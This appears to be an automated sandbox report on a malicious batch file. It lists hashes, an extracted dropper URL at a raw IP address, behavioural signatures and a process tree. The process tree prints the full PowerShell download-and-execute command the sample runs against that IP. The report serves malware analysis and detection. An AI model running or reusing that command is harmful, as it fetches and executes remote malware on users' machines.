Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows10_x64 -
resource
win10 -
submitted
04-08-2020 12:19
Static task
static1
Behavioral task
behavioral1
Sample
21b6d26f5616dbe4b9f07bd5660bb62d.bat
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
21b6d26f5616dbe4b9f07bd5660bb62d.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
21b6d26f5616dbe4b9f07bd5660bb62d.bat
-
Size
215B
-
MD5
d0dba6d8db0dbf8637507b05349fd02f
-
SHA1
e3795cff8728780bd8d72ae5f7e317ee93075e93
-
SHA256
085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8
-
SHA512
de33e169bfaf0170acb3053f62d40e115e162671c77555e7c0bae5e12579f7900f1172296279167f120a3821566ee8b111e5e2e366711bf0d5fde9e5e3340b7f
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d
Signatures
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe 3844 WerFault.exe -
ServiceHost packer 5 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/4044-3-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/4044-2-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/4044-4-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/4044-5-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/4044-6-0x0000000000000000-mapping.dmp servicehost -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3676 wrote to memory of 4044 3676 cmd.exe powershell.exe PID 3676 wrote to memory of 4044 3676 cmd.exe powershell.exe PID 3676 wrote to memory of 4044 3676 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3844 4044 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3844 WerFault.exe Token: SeBackupPrivilege 3844 WerFault.exe Token: SeDebugPrivilege 3844 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\21b6d26f5616dbe4b9f07bd5660bb62d.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d');Invoke-NWPLCMRG;Start-Sleep -s 10000"2⤵PID:4044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 7003⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3844